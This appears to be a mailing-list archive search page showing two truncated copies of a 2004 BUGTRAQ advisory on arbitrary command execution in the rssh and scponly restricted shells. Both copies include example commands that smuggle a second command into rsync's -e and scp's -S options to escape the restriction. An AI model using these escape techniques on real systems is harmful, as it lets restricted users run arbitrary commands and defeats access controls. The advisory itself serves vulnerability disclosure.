Displaying 2 results from an estimated 2 matches for "restricteduser".
2005 Jan 15
0
rssh and scponly arbitrary command execution
...ulnerable. rssh with cvs is
> also not vulnerable using these techniques. However, it is quite probable
> that a malicious user could check out a carefully crafted CVS repository and
> execute arbitrary commands using CVS's hooks interface.
>
> Examples:
>
> ssh restricteduser at remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'
>
> scp command.sh restricteduser at remotehost:/tmp/command.sh
> ssh restricteduser at remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
>
> Solution:
>...
2004 Dec 03
1
[BUGTRAQ] rssh and scponly arbitrary command execution
...sftp-server does not appear to be vulnerable. rssh with cvs is
also not vulnerable using these techniques. However, it is quite probable
that a malicious user could check out a carefully crafted CVS repository and
execute arbitrary commands using CVS's hooks interface.
Examples:
ssh restricteduser at remotehost 'rsync -e "touch /tmp/example --" localhost:/dev/null /tmp'
scp command.sh restricteduser at remotehost:/tmp/command.sh
ssh restricteduser at remotehost 'scp -S /tmp/command.sh localhost:/dev/null /tmp'
Solution:
There are no workarounds fo...